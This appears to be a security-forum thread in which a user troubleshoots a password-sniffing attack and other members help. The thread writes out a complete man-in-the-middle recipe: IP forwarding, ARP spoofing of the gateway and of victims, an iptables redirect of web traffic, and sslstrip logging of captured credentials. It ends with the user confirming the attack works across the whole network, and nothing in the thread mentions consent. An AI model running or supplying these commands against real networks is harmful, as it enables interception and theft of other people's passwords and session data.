Problem with Password Sniffing with SSLStrip
While on VMware everything was working perfectly, these are the commands I always entered in the following order:
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward (returned with NUM 1)
arpspoof -i wlan0 192.168.1.1 (gateway is just being used so that I can sniff the whole network)
iptables --flush
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
sslstrip -a -f -k -l 8080
(creates sslstrip.log)
Now that I'm running a HD install (no more vmware) these steps are not working anymore...
Even the sslstrip.log is not saving anything...
BT4-Final
uname -r: 2.6.34
HD Install
Re: Problem with Password Sniffing with SSLStrip
I would suggest you try sniffing only 1 target and post back the results.
Code:
arpspoof -i wlan0 -t VictimIP DefaultGW
Oh and by the way turn off your firewall (if you have one)
Re: Problem with Password Sniffing with SSLStrip
Quote:
Originally Posted by
sickness
I would suggest you try sniffing only 1 target and post back the results.
Code:
arpspoof -i wlan0 -t VictimIP DefaultGW
Oh and by the way turn off your firewall (if you have one)
why can't I sniff the whole network though ? and before this worked with no problems..
Re: Problem with Password Sniffing with SSLStrip
Not a hundred percent sure as I am trying to get my head round several issues that
I have with this programme...
However, the command...
sslstrip -a -f -k -l 8080
does the -k switch no kill the process before it has run
-k , --killsessions Kill sessions in progress.
the above was taken from the splash screen when sslstrip is first run.
I may be wrong but who knows........
Rab.
Re: Problem with Password Sniffing with SSLStrip
Well that's what we are trying to find out, so try with only 1 target and give us a feedback :)
Re: Problem with Password Sniffing with SSLStrip
if you use said commands and run wireshark are you seeing any packets being redirected to you? anything on port 80 like get requests?
usually i tend to poison both ways instead of just one way like you are doing, just poisoning the gateway in one direction doesn't work well for me. usuallyu i poison the gateway and the clients on it, so i can get both sides of the conversation like this
Code:
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1
take a look at irongeeks page Basics of Arpspoofing/Arppoisoning
Re: Problem with Password Sniffing with SSLStrip
Quote:
Originally Posted by
sickness
I would suggest you try sniffing only 1 target and post back the results.
Code:
arpspoof -i wlan0 -t VictimIP DefaultGW
Oh and by the way turn off your firewall (if you have one)
ok, thanks this has worked (i had a thought it would, just didn't go with it). I think I got stuck at trying to arpspoof my self as well as the whole network and checking to see if it works while I'm on the same computer instead of going on the other computer and seeing the results... well this time I did.
But why all of the sudden, I can't arpspoof (-i wlan0 -t 192.168.1.ME 192.168.1.1) my self on HD install ? On vmware this wasn't a problem.
Never the less, sniffing the whole network still works, I just never tried to see the results on another computer..thanks guys!
Re: Problem with Password Sniffing with SSLStrip
No problem glad we could help :)
